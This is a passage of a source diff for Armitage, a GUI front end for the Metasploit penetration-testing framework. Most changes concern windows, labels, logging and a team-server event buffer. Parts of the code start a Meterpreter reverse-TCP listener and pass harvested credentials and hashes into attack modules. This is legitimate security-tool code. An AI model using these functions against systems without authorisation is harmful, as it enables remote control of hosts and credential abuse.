[$dialog setLocationRelativeTo: $frame];
[$dialog setLocationRelativeTo: $__frame__];
$label = [new JLabel: "Enter one host/line:"];
$text = [new JTextArea];

67
external/source/armitage/scripts/jobs.sl vendored
View File

@ -16,47 +16,7 @@ import java.awt.event.*;
import ui.*;
sub manage_proxy_server {
manage_job("Auxiliary: server/socks4a",
# start server function
{
launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", $null);
},
# description of job (for job kill function)
{
local('$host $port');
($host, $port) = values($2["datastore"], @("SRVHOST", "SRVPORT"));
return "SOCKS proxy is running on $host $+ : $+ $port $+ .\nWould you like to stop it?";
}
);
}
sub report_url {
find_job($name, {
if ($1 == -1) {
showError("Server not found");
}
else {
local('$job $host $port $uripath');
$job = call($client, "job.info", $1);
($host, $port) = values($job["info"]["datastore"], @("SRVHOST", "SRVPORT"));
$uripath = $job["info"]["uripath"];
local('$dialog $text $ok');
$dialog = dialog("Output", 320, 240);
$text = [new JTextArea];
[$text setText: "http:// $+ $host $+ : $+ $port $+ $uripath"];
$button = [new JButton: "Ok"];
[$button addActionListener: lambda({ [$dialog setVisible: 0]; }, \$dialog)];
[$dialog add: [new JScrollPane: $text], [BorderLayout CENTER]];
[$dialog add: center($button), [BorderLayout SOUTH]];
[$dialog setVisible: 1];
}
});
launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1);
}
sub find_job {
@ -80,26 +40,6 @@ sub find_job {
}, $name => $1, $function => $2));
}
# manage_job(job name, { start job function }, { job dialog info })
sub manage_job {
local('$name $startf $stopf');
($name, $startf, $stopf) = @_;
find_job($name, lambda({
if ($1 == -1) {
[$startf];
}
else {
local('$job $confirm $foo $confirm');
$job = call($client, "job.info", $1);
$confirm = askYesNo([$stopf : $1, $job], "Stop Job");
if ($confirm eq "0") {
call_async($client, "job.stop", $1);
}
}
}, \$startf, \$stopf));
}
sub generatePayload {
local('$file');
$file = saveFile2();
@ -450,6 +390,11 @@ sub _launch_dialog {
elog("launched DNS enum for $domain");
}
}
else if ($type eq "auxiliary" && $command eq "server/socks4a") {
local('$host $port');
($host, $port) = values($options, @('SRVHOST', 'SRVPORT'));
elog("started SOCKS proxy server at $host $+ : $+ $port");
}
launch_service($title, "$type $+ / $+ $command", $options, $type, $format => [$combo getSelectedItem]);
}

14
external/source/armitage/scripts/log.sl vendored
View File

@ -15,8 +15,8 @@ sub logNow {
if ([$preferences getProperty: "armitage.log_everything.boolean", "true"] eq "true") {
local('$today $stream');
$today = formatDate("yyMMdd");
mkdir(getFileProper(dataDirectory(), $today, $2));
$stream = %logs[ getFileProper(dataDirectory(), $today, $2, "$1 $+ .log") ];
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2));
$stream = %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$1 $+ .log") ];
[$stream println: $3];
}
}
@ -26,8 +26,8 @@ sub logCheck {
local('$today');
$today = formatDate("yyMMdd");
if ($2 ne "") {
mkdir(getFileProper(dataDirectory(), $today, $2));
[$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $2, "$3 $+ .log") ]];
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2));
[$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$3 $+ .log") ]];
}
}
}
@ -38,7 +38,7 @@ sub logFile {
local('$today $handle $data $out');
$today = formatDate("yyMMdd");
if (-exists $1 && -canread $1) {
mkdir(getFileProper(dataDirectory(), $today, $2, $3));
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3));
# read in the file
$handle = openf($1);
@ -46,7 +46,7 @@ sub logFile {
closef($handle);
# write it out.
$out = getFileProper(dataDirectory(), $today, $2, $3, getFileName($1));
$out = getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3, getFileName($1));
$handle = openf("> $+ $out");
writeb($handle, $data);
closef($handle);
@ -70,7 +70,7 @@ sub initLogSystem {
logFile([$file getAbsolutePath], "screenshots", ".");
deleteFile([$file getAbsolutePath]);
showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/screenshots");
showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/ $+ $DESCRIBE $+ /screenshots");
}, \$image, \$title));
}];
}

37
external/source/armitage/scripts/menus.sl vendored
View File

@ -54,6 +54,29 @@ sub host_selected_items {
item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista"));
item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8"));
item($h, "Set Label...", 'S', lambda({
# calculate preexisting label to prompt with
local('$label %l $host');
# get a label
foreach $host ($hosts) {
if ($label eq "") {
$label = getHostLabel($host);
}
}
# ask for a label
$label = ask("Set label to:", $label);
if ($label !is $null) {
foreach $host ($hosts) {
%l[$host] = ["$label" trim];
}
call_async($mclient, "db.report_labels", %l);
}
}, $hosts => $2));
separator($h);
item($h, "Remove Host", 'R', clearHostFunction($2));
}
@ -96,10 +119,13 @@ sub view_items {
sub armitage_items {
local('$m');
item($1, 'Preferences', 'P', &createPreferencesTab);
item($1, 'New Connection', 'N', {
[new armitage.ArmitageMain: cast(@ARGV, ^String), $__frame__, $null];
});
separator($1);
item($1, 'Preferences', 'P', &createPreferencesTab);
dynmenu($1, 'Set Target View', 'S', {
local('$t1 $t2');
if ([$preferences getProperty: "armitage.string.target_view", "graph"] eq "graph") {
@ -160,12 +186,13 @@ sub armitage_items {
separator($1);
item($1, 'Exit', 'x', {
item($1, 'Close', 'C', {
if ($msfrpc_handle !is $null) {
closef($msfrpc_handle);
}
[System exit: 0];
map({ closef($1); }, @CLOSEME);
[$__frame__ quit];
});
}
@ -223,7 +250,7 @@ sub help_items {
[$dialog add: $label, [BorderLayout CENTER]];
[$dialog pack];
[$dialog setLocationRelativeTo: $null];
[$dialog setLocationRelativeTo: $__frame__];
[$dialog setVisible: 1];
});
}

76
external/source/armitage/scripts/passhash.sl vendored
View File

@ -58,12 +58,38 @@ import ui.*;
sub refreshCredsTable {
thread(lambda({
[Thread yield];
local('$creds $cred');
local('$creds $cred $desc $aclient %check $key');
[$model clear: 128];
$creds = call($mclient, "db.creds2", [new HashMap])["creds2"];
foreach $desc => $aclient (convertAll([$__frame__ getClients])) {
$creds = call($aclient, "db.creds2", [new HashMap])["creds2"];
foreach $cred ($creds) {
$key = join("~~", values($cred, @("user", "pass", "host")));
if ($key in %check) {
}
else if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
[$model addEntry: $cred];
%check[$key] = 1;
}
}
}
[$model fireListeners];
}, $model => $1, $title => $2));
}
sub refreshCredsTableLocal {
thread(lambda({
[Thread yield];
local('$creds $cred $desc $aclient %check $key');
[$model clear: 128];
$creds = call($client, "db.creds2", [new HashMap])["creds2"];
foreach $cred ($creds) {
if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
$key = join("~~", values($cred, @("user", "pass", "host")));
if ($key in %check) {
}
else if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
[$model addEntry: $cred];
%check[$key] = 1;
}
}
[$model fireListeners];
@ -71,7 +97,7 @@ sub refreshCredsTable {
}
sub show_hashes {
local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll');
local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll $3');
$dialog = dialog($1, 480, $2);
@ -83,7 +109,12 @@ sub show_hashes {
[$sorter setComparator: 2, &compareHosts];
[$table setRowSorter: $sorter];
refreshCredsTable($model, $1);
if ($3) {
refreshCredsTableLocal($model, $1);
}
else {
refreshCredsTable($model, $1);
}
$scroll = [new JScrollPane: $table];
[$scroll setPreferredSize: [new Dimension: 480, 130]];
@ -94,7 +125,7 @@ sub show_hashes {
sub createCredentialsTab {
local('$dialog $table $model $panel $export $crack $refresh');
($dialog, $table, $model) = show_hashes("", 320);
($dialog, $table, $model) = show_hashes("", 320, 1);
[$dialog removeAll];
addMouseListener($table, lambda({
@ -131,7 +162,7 @@ sub createCredentialsTab {
$refresh = [new JButton: "Refresh"];
[$refresh addActionListener: lambda({
refreshCredsTable($model, $null);
refreshCredsTableLocal($model, $null);
}, \$model)];
$crack = [new JButton: "Crack Passwords"];
@ -372,3 +403,34 @@ sub launchBruteForce {
[$console start];
}, $type => $1, $module => $2, $options => $3, $title => $4));
}
sub credentialHelper {
thread(lambda({
[Thread yield];
# gather our credentials please
local('$creds $cred @creds');
$creds = call($mclient, "db.creds2", [new HashMap])["creds2"];
foreach $cred ($creds) {
if ($PASS eq "SMBPass" || $cred['ptype'] ne "smb_hash") {
push(@creds, $cred);
}
}
# pop up a dialog to let the user choose their favorite set
quickListDialog("Choose credentials", "Select", @("user", "user", "pass", "host"), @creds, $width => 640, $height => 240, lambda({
if ($1 eq "") {
return;
}
local('$user $pass');
$user = [$3 getSelectedValueFromColumn: $2, 'user'];
$pass = [$3 getSelectedValueFromColumn: $2, 'pass'];
[$model setValueForKey: $USER, "Value", $user];
[$model setValueForKey: $PASS, "Value", $pass];
[$model fireListeners];
}, \$callback, \$model, \$USER, \$PASS));
}, \$USER, \$PASS, \$model, $callback => $4));
}

4
external/source/armitage/scripts/pivots.sl vendored
View File

@ -107,10 +107,10 @@ sub pivot_dialog {
}
local('$dialog $model $table $sorter $center $a $route $button');
$dialog = [new JDialog: $frame, $title, 0];
$dialog = [new JDialog: $__frame__, $title, 0];
[$dialog setSize: 320, 240];
[$dialog setLayout: [new BorderLayout]];
[$dialog setLocationRelativeTo: $frame];
[$dialog setLocationRelativeTo: $__frame__];
[$dialog setLayout: [new BorderLayout]];

32
external/source/armitage/scripts/reporting.sl vendored
View File

@ -182,28 +182,21 @@ sub queryData {
[$progress setProgress: 30];
}
# 4. clients
%r['clients'] = call($mclient, "db.clients")["clients"];
if ($progress) {
[$progress setProgress: 35];
}
# 5. sessions...
# 4. sessions...
%r['sessions'] = fixSessions(call($mclient, "db.sessions")["sessions"]);
if ($progress) {
[$progress setProgress: 36];
}
# 6. timeline
# 5. timeline
%r['timeline'] = fixTimeline(call($mclient, "db.events")['events']);
if ($progress) {
[$progress setProgress: 38];
}
# 7. hosts and services
# 6. hosts and services
local('@hosts @services $temp $h $s $x');
call($mclient, "armitage.prep_export", $1);
@ -291,32 +284,27 @@ sub _generateArtifacts {
[$progress setProgress: 65];
# 4. clients
dumpData("clients", @("host", "created_at", "updated_at", "ua_name", "ua_ver", "ua_string"), %data['clients']);
[$progress setProgress: 70];
# 5. hosts
# 4. hosts
dumpData("hosts", @("address", "mac", "state", "address", "address6", "name", "purpose", "info", "os_name", "os_flavor", "os_sp", "os_lang", "os_match", "created_at", "updated_at"), %data['hosts']);
[$progress setProgress: 80];
# 6. services
# 5. services
dumpData("services", @("host", "port", "state", "proto", "name", "created_at", "updated_at", "info"), %data['services']);
[$progress setProgress: 90];
# 7. sessions
# 6. sessions
dumpData("sessions", @("host", "local_id", "stype", "platform", "via_payload", "via_exploit", "opened_at", "last_seen", "closed_at", "close_reason"), %data['sessions']);
[$progress setProgress: 93];
# 8. timeline
# 7. timeline
dumpData("timeline", @("source", "username", "created_at", "info"), %data['timeline']);
[$progress setProgress: 96];
# 9. take a pretty screenshot of the graph view...
# 8. take a pretty screenshot of the graph view...
[$progress setNote: "host picture :)"];
makeScreenshot("hosts.png");
@ -330,7 +318,7 @@ sub _generateArtifacts {
fire_event_async("user_export", %data);
return getFileProper(dataDirectory(), formatDate("yyMMdd"), "artifacts");
return getFileProper(dataDirectory(), formatDate("yyMMdd"), $DESCRIBE, "artifacts");
}
#
@ -368,8 +356,6 @@ sub api_export_data {
}
sub initReporting {
global('$poll_lock @events'); # set in the dserver, not in stand-alone Armitage
wait(fork({
global('$db');
[$client addHook: "armitage.export_data", &api_export_data];

64
external/source/armitage/scripts/server.sl vendored
View File

@ -35,9 +35,7 @@ sub result {
sub event {
local('$result');
$result = formatDate("HH:mm:ss") . " $1";
acquire($poll_lock);
push(@events, $result);
release($poll_lock);
[$events put: $result];
}
sub client {
@ -96,16 +94,6 @@ sub client {
[[$handle getOutputStream] flush];
}
# limit our replay of the event log to 100 events...
acquire($poll_lock);
if (size(@events) > 100) {
$index = size(@events) - 100;
}
else {
$index = 0;
}
release($poll_lock);
#
# on our merry way processing it...
#
@ -183,33 +171,30 @@ sub client {
else if ($method eq "armitage.log") {
($data, $address) = $args;
event("* $eid $data $+ \n");
if ($address is $null) {
$address = [$client getLocalAddress];
}
call_async($client, "db.log_event", "$address $+ // $+ $eid", $data);
writeObject($handle, result(%()));
}
else if ($method eq "armitage.skip") {
acquire($poll_lock);
$index = size(@events);
release($poll_lock);
[$events get: $eid];
writeObject($handle, result(%()));
}
else if ($method eq "armitage.poll" || $method eq "armitage.push") {
acquire($poll_lock);
if ($method eq "armitage.push") {
($null, $data) = $args;
foreach $temp (split("\n", $data)) {
push(@events, formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data);
[$events put: formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data];
}
}
if (size(@events) > $index) {
$rv = result(%(data => join("", sublist(@events, $index)), encoding => "base64", prompt => "$eid $+ > "));
$index = size(@events);
}
else {
$rv = result(%(data => "", prompt => "$eid $+ > ", encoding => "base64"));
}
release($poll_lock);
$rv = result(%(data => [$events get: $eid], encoding => "base64", prompt => "$eid $+ > "));
writeObject($handle, $rv);
}
else if ($method eq "armitage.lusers") {
$rv = [new HashMap];
[$rv put: "lusers", [$events clients]];
writeObject($handle, $rv);
}
else if ($method eq "armitage.append") {
@ -308,6 +293,10 @@ sub client {
$response = [$client execute: $method, cast($args, ^Object)];
writeObject($handle, $response);
}
else if ($method eq "module.execute_direct") {
$response = [$client execute: "module.execute", cast($args, ^Object)];
writeObject($handle, $response);
}
else if ($method in %async) {
if ($args) {
[$client execute_async: $method, cast($args, ^Object)];
@ -333,6 +322,7 @@ sub client {
if ($eid !is $null) {
event("*** $eid left.\n");
[$events free: $eid];
}
# reset the user's filter...
@ -355,7 +345,7 @@ sub client {
sub main {
global('$client $mclient');
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console');
local('$server %sessions $sess_lock $read_lock $lock_lock %locks %readq $id $error $auth %cache $cach_lock $client_cache $handle $console $events');
$auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0];
@ -403,9 +393,6 @@ sub main {
# we need this global to be set so our reverse listeners work as expected.
$MY_ADDRESS = $host;
# make sure clients know a team server is present. can't happen async.
call($client, "core.setg", "ARMITAGE_TEAM", '1');
#
# setup the client cache
#
@ -416,10 +403,12 @@ sub main {
#
$sess_lock = semaphore(1);
$read_lock = semaphore(1);
$poll_lock = semaphore(1);
$lock_lock = semaphore(1);
$cach_lock = semaphore(1);
# setup any shared buffers...
$events = [new armitage.ArmitageBuffer: 250];
# set the LHOST to whatever the user specified (use console.write to make the string not UTF-8)
$console = createConsole($client);
call($client, "console.write", $console, "setg LHOST $host $+ \n");
@ -427,6 +416,9 @@ sub main {
# absorb the output of this command which is LHOST => ...
call($client, "console.read", $console);
# update server's understanding of this value...
call($client, "armitage.set_ip", $host);
#
# create a thread to push console messages to the event queue for all clients.
#
@ -436,12 +428,10 @@ sub main {
sleep(2000);
$r = call($client, "console.read", $console);
if ($r["data"] ne "") {
acquire($poll_lock);
push(@events, formatDate("HH:mm:ss") . " " . $r["data"]);
release($poll_lock);
[$events put: formatDate("HH:mm:ss") . " " . $r["data"]];
}
}
}, \$client, \$poll_lock, \@events, \$console);
}, \$client, \$events, \$console);
#
# Create a shared hash that contains a thread for each session...
@ -538,7 +528,7 @@ service framework-postgres start");
$handle = [$server accept];
if ($handle !is $null) {
%readq[$id] = %();
fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, \$poll_lock, $queue => %readq[$id], \$id, \@events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass);
fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, $queue => %readq[$id], \$id, \$events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass);
$id++;
}

25
external/source/armitage/scripts/targets.sl vendored
View File

@ -21,6 +21,10 @@ sub getHostOS {
return iff($1 in %hosts, %hosts[$1]['os_name'], $null);
}
sub getHostLabel {
return iff($1 in %hosts, %hosts[$1]['label'], $null);
}
sub getSessions {
return iff($1 in %hosts && 'sessions' in %hosts[$1], %hosts[$1]['sessions']);
}
@ -122,7 +126,7 @@ on sessions {
}
if ($host['show'] eq "1") {
push(@nodes, @($id, describeHost($host), showHost($host), $tooltip));
push(@nodes, @($id, $host['label'] . "", describeHost($host), showHost($host), $tooltip));
}
}
@ -130,14 +134,14 @@ on sessions {
}
sub refreshGraph {
local('$node $id $description $icons $tooltip $highlight');
local('$node $id $label $description $icons $tooltip $highlight');
# update everything...
[$graph start];
# do the hosts?
foreach $node (@nodes) {
($id, $description, $icons, $tooltip) = $node;
[$graph addNode: $id, $description, $icons, $tooltip];
($id, $label, $description, $icons, $tooltip) = $node;
[$graph addNode: $id, $label, $description, $icons, $tooltip];
}
# update the routes
@ -189,6 +193,11 @@ on hosts {
$address = $host['address'];
if ($address in %hosts && size(%hosts[$address]) > 1) {
%newh[$address] = %hosts[$address];
# set the label to empty b/c team server won't add labels if there are no labels. This fixes
# a corner case where a user might clear all labels and find they won't go away
%newh[$address]['label'] = '';
putAll(%newh[$address], keys($host), values($host));
if ($host['os_name'] eq "") {
@ -258,7 +267,7 @@ sub _importHosts {
}
$console = createDisplayTab("Import", $file => "import");
[$console addCommand: $null, "db_import " . strrep(join(" ", $files), "\\", "\\\\")];
[$console addCommand: 'x', "db_import " . strrep(join(" ", $files), "\\", "\\\\")];
[$console addListener: lambda({
elog("imported hosts from $success file" . iff($success != 1, "s"));
}, \$success)];
@ -342,8 +351,10 @@ sub clearHostFunction {
}
sub clearDatabase {
elog("cleared the database");
call_async($mclient, "db.clear");
if (!askYesNo("This action will clear the database. You will lose all information\ncollected up to this point. You will not be able toget it back.\nWould you like to clear the database?", "Clear Database")) {
elog("cleared the database");
call_async($mclient, "db.clear");
}
}
# called when a target is clicked on...

56
external/source/armitage/scripts/util.sl vendored
View File

@ -151,6 +151,11 @@ sub createConsoleTab {
}
sub setg {
# update team server's understanding of LHOST
if ($1 eq "LHOST") {
call_async($client, "armitage.set_ip", $2);
}
%MSF_GLOBAL[$1] = $2;
local('$c');
$c = createConsole($client);
@ -159,12 +164,15 @@ sub setg {
}
sub createDefaultHandler {
warn("Creating a default reverse handler...");
# setup a handler for meterpreter
setg("LPORT", randomPort());
local('$port');
$port = randomPort();
setg("LPORT", $port);
warn("Creating a default reverse handler... 0.0.0.0: $+ $port");
call_async($client, "module.execute", "exploit", "multi/handler", %(
PAYLOAD => "windows/meterpreter/reverse_tcp",
LHOST => "0.0.0.0",
LPORT => $port,
ExitOnSession => "false"
));
}
@ -307,7 +315,12 @@ sub startMetasploit {
savePreferences();
}
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null];
if ("*apps*pro*" iswm $msfdir) {
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd_new.bat"), $null];
}
else {
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null];
}
$data = join("\r\n", readAll($handle, -1));
closef($handle);
@ -373,7 +386,7 @@ sub connectDialog {
$msfrpc_handle = $null;
}
local('$dialog $host $port $ssl $user $pass $button $cancel $start $center $help $helper');
local('$dialog $host $port $ssl $user $pass $button $start $center $help $helper');
$dialog = window("Connect...", 0, 0);
# setup our nifty form fields..
@ -390,8 +403,6 @@ sub connectDialog {
$help = [new JButton: "Help"];
[$help setToolTipText: "<html>Use this button to view the Getting Started Guide on the Armitage homepage</html>"];
$cancel = [new JButton: "Exit"];
# lay them out
$center = [new JPanel];
@ -414,9 +425,14 @@ sub connectDialog {
($h, $p, $u, $s) = @o;
[$dialog setVisible: 0];
connectToMetasploit($h, $p, $u, $s);
if ($h eq "127.0.0.1" || $h eq "localhost") {
if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") {
if ($__frame__ && [$__frame__ checkLocal]) {
showError("You can't connect to localhost twice");
[$dialog setVisible: 1];
return;
}
try {
closef(connect("127.0.0.1", $p, 1000));
}
@ -426,37 +442,33 @@ sub connectDialog {
}
}
}
connectToMetasploit($h, $p, $u, $s);
}, \$dialog, \$host, \$port, \$user, \$pass)];
[$help addActionListener: gotoURL("http://www.fastandeasyhacking.com/start")];
[$cancel addActionListener: {
[System exit: 0];
}];
[$dialog pack];
[$dialog setLocationRelativeTo: $null];
[$dialog setVisible: 1];
}
sub _elog {
sub elog {
local('$2');
if ($client !is $mclient) {
# $2 can be NULL here. team server will populate it...
call_async($mclient, "armitage.log", $1, $2);
}
else {
# since we're not on a team server, no one else will have
# overwritten LHOST, so we can trust $MY_ADDRESS to be current
if ($2 is $null) {
$2 = $MY_ADDRESS;
}
call_async($client, "db.log_event", "$2 $+ //", $1);
}
}
sub elog {
local('$2');
if ($2 is $null) {
$2 = $MY_ADDRESS;
}
_elog($1, $2);
}
sub module_execute {
return invoke(&_module_execute, filter_data_array("user_launch", @_));
}

23
external/source/armitage/scripts/workspaces.sl vendored
View File

@ -33,7 +33,7 @@ sub listWorkspaces {
$dialog = [new JPanel];
[$dialog setLayout: [new BorderLayout]];
($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "session"), @());
($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "labels", "session"), @());
updateWorkspaceList($table, $model);
[$table setSelectionMode: [ListSelectionModel MULTIPLE_INTERVAL_SELECTION]];
@ -88,15 +88,16 @@ sub workspaceDialog {
local('$table $model');
($table, $model) = $2;
local('$dialog $name $host $ports $os $button $session');
local('$dialog $name $host $ports $os $button $session $label');
$dialog = dialog($title, 640, 480);
[$dialog setLayout: [new GridLayout: 6, 1]];
[$dialog setLayout: [new GridLayout: 7, 1]];
$name = [new ATextField: $1['name'], 16];
[$name setEnabled: $enable];
$host = [new ATextField: $1['hosts'], 16];
$ports = [new ATextField: $1['ports'], 16];
$os = [new ATextField: $1['os'], 16];
$label = [new ATextField: $1['labels'], 16];
$session = [new JCheckBox: "Hosts with sessions only"];
if ($1['session'] eq 1) {
[$session setSelected: 1];
@ -108,6 +109,7 @@ sub workspaceDialog {
[$dialog add: label_for("Hosts:", 60, $host)];
[$dialog add: label_for("Ports:", 60, $ports)];
[$dialog add: label_for("OS:", 60, $os)];
[$dialog add: label_for("Labels:", 60, $label)];
[$dialog add: $session];
[$dialog add: center($button)];
@ -116,15 +118,16 @@ sub workspaceDialog {
[$button addActionListener: lambda({
# yay, we have a dialog...
local('$n $h $p $o $s @workspaces $ws $temp');
local('$n $h $p $o $s $l @workspaces $ws $temp');
$n = [[$name getText] trim];
$h = [strrep([$host getText], '*', '%', '?', '_') trim];
$p = [[$ports getText] trim];
$o = [strrep([$os getText], '*', '%', '?', '_') trim];
$l = [[$label getText] trim];
$s = [$session isSelected];
# save the new menu
$ws = workspace($n, $h, $p, $o, $s);
$ws = workspace($n, $h, $p, $o, $s, $l);
@workspaces = workspaces();
foreach $temp (@workspaces) {
if ($temp["name"] eq $n) {
@ -140,7 +143,7 @@ sub workspaceDialog {
updateWorkspaceList($table, $model);
[$dialog setVisible: 0];
}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model)];
}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model, \$label)];
}
sub reset_workspace {
@ -199,16 +202,16 @@ sub set_workspace {
}
sub workspace {
return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5);
return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5, labels => $6);
}
sub workspaces {
local('$ws @r $name $host $port $os $session $workspace');
local('$ws @r $name $host $port $os $session $workspace $label');
$ws = split("!!", [$preferences getProperty: "armitage.workspaces.menus", ""]);
foreach $workspace ($ws) {
if ($workspace ne "") {
($name, $host, $port, $os, $session) = split('@@', $workspace);
push(@r, workspace($name, $host, $port, $os, $session));
($name, $host, $port, $os, $session, $label) = split('@@', $workspace);
push(@r, workspace($name, $host, $port, $os, $session, $label));
}
}
return @r;

44
external/source/armitage/src/armitage/ArmitageApplication.java vendored
View File

@ -13,13 +13,32 @@ import cortana.gui.MenuBuilder;
import ui.*;
public class ArmitageApplication extends JFrame {
public class ArmitageApplication extends JComponent {
protected JTabbedPane tabs = null;
protected JSplitPane split = null;
protected JMenuBar menus = new JMenuBar();
protected ScreenshotManager screens = null;
protected KeyBindings keys = new KeyBindings();
protected MenuBuilder builder = null;
protected String title = "";
protected MultiFrame window = null;
public KeyBindings getBindings() {
return keys;
}
public void setTitle(String title) {
this.title = title;
window.setTitle(this, title);
}
public String getTitle() {
return title;
}
public void setIconImage(Image blah) {
window.setIconImage(blah);
}
public void setScreenshotManager(ScreenshotManager m) {
screens = m;
@ -192,10 +211,11 @@ public class ArmitageApplication extends JFrame {
/* pop goes the tab! */
final JFrame r = new JFrame(t.title);
r.setIconImages(getIconImages());
//r.setIconImages(getIconImages());
r.setLayout(new BorderLayout());
r.add(t.component, BorderLayout.CENTER);
r.pack();
t.component.validate();
r.addWindowListener(new WindowAdapter() {
public void windowClosing(WindowEvent ev) {
@ -365,8 +385,20 @@ public class ArmitageApplication extends JFrame {
component.requestFocusInWindow();
}
public ArmitageApplication() {
public void touch() {
Component c = tabs.getSelectedComponent();
if (c == null)
return;
if (c instanceof Activity)
((Activity)c).resetNotification();
c.requestFocusInWindow();
}
public ArmitageApplication(MultiFrame f, String details, msf.RpcConnection conn) {
super();
window = f;
tabs = new DraggableTabbedPane();
setLayout(new BorderLayout());
@ -382,10 +414,8 @@ public class ArmitageApplication extends JFrame {
/* add our tabbed pane */
add(split, BorderLayout.CENTER);
/* setup our key bindings */
KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(keys);
/* ... */
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
//setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
((ui.MultiFrame)window).addButton(details, this, conn);
}
}

138
external/source/armitage/src/armitage/ArmitageBuffer.java vendored Normal file
View File

@ -0,0 +1,138 @@
package armitage;
import java.util.*;
/*
* Implement a thread safe store that any client may write to and
* any client may read from (keeping track of their cursor into
* the console)
*/
public class ArmitageBuffer {
private static final class Message {
public String message = null;
public Message next = null;
}
/* store our messages... */
public Message first = null;
public Message last = null;
public long size = 0;
public long max = 0;
public String prompt = "";
/* store indices into this buffer */
public Map indices = new HashMap();
/* setup the buffer?!? :) */
public ArmitageBuffer(long max) {
this.max = max;
}
/* store a prompt with this buffer... we're not going to do any indexing magic for now */
public String getPrompt() {
synchronized (this) {
return prompt;
}
}
/* set the prompt */
public void setPrompt(String text) {
synchronized (this) {
prompt = text;
}
}
/* post a message to this buffer */
public void put(String text) {
synchronized (this) {
/* create our message */
Message m = new Message();
m.message = text;
/* store our message */
if (last == null && first == null) {
first = m;
last = m;
}
else {
last.next = m;
last = m;
}
/* increment number of stored messages */
size += 1;
/* limit the total number of past messages to the max size */
if (size > max) {
first = first.next;
}
}
}
/* retrieve a set of all clients consuming this buffer */
public Collection clients() {
synchronized (this) {
LinkedList clients = new LinkedList(indices.keySet());
return clients;
}
}
/* free a client */
public void free(String id) {
synchronized (this) {
indices.remove(id);
}
}
/* reset our indices too */
public void reset() {
synchronized (this) {
first = null;
last = null;
indices.clear();
size = 0;
}
}
/* retrieve all messages available to the client (if any) */
public String get(String id) {
synchronized (this) {
/* nadaz */
if (first == null)
return "";
/* get our index into the buffer */
Message index = null;
if (!indices.containsKey(id)) {
index = first;
}
else {
index = (Message)indices.get(id);
/* nothing happening */
if (index.next == null)
return "";
index = index.next;
}
/* now let's walk through it */
StringBuffer result = new StringBuffer();
Message temp = index;
while (temp != null) {
result.append(temp.message);
index = temp;
temp = temp.next;
}
/* store our index */
indices.put(id, index);
return result.toString();
}
}
public String toString() {
return "[" + size + " messages]";
}
}

35
external/source/armitage/src/armitage/ArmitageMain.java vendored
View File

@ -9,10 +9,10 @@ import sleep.engine.*;
import sleep.parser.ParserConfig;
import java.util.*;
import java.io.*;
import cortana.core.*;
import ui.*;
/**
* This class launches Armitage and loads the scripts that are part of it.
@ -101,7 +101,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
};
}
public ArmitageMain(String[] args) {
public ArmitageMain(String[] args, MultiFrame window, boolean serverMode) {
/* tweak the parser to recognize a few useful escapes */
ParserConfig.installEscapeConstant('c', console.Colors.color + "");
ParserConfig.installEscapeConstant('U', console.Colors.underline + "");
@ -118,15 +118,6 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
ScriptLoader loader = new ScriptLoader();
loader.addSpecificBridge(this);
/* check for server mode option */
boolean serverMode = false;
int x = 0;
for (x = 0; x < args.length; x++) {
if (args[x].equals("--server"))
serverMode = true;
}
/* setup Cortana event and filter bridges... we will install these into
Armitage */
if (!serverMode) {
@ -135,6 +126,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
variables.putScalar("$__events__", SleepUtils.getScalar(events));
variables.putScalar("$__filters__", SleepUtils.getScalar(filters));
variables.putScalar("$__frame__", SleepUtils.getScalar(window));
loader.addGlobalBridge(events.getBridge());
loader.addGlobalBridge(filters.getBridge());
@ -142,7 +134,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
/* load the appropriate scripts */
String[] scripts = serverMode ? getServerScripts() : getGUIScripts();
int x = -1;
try {
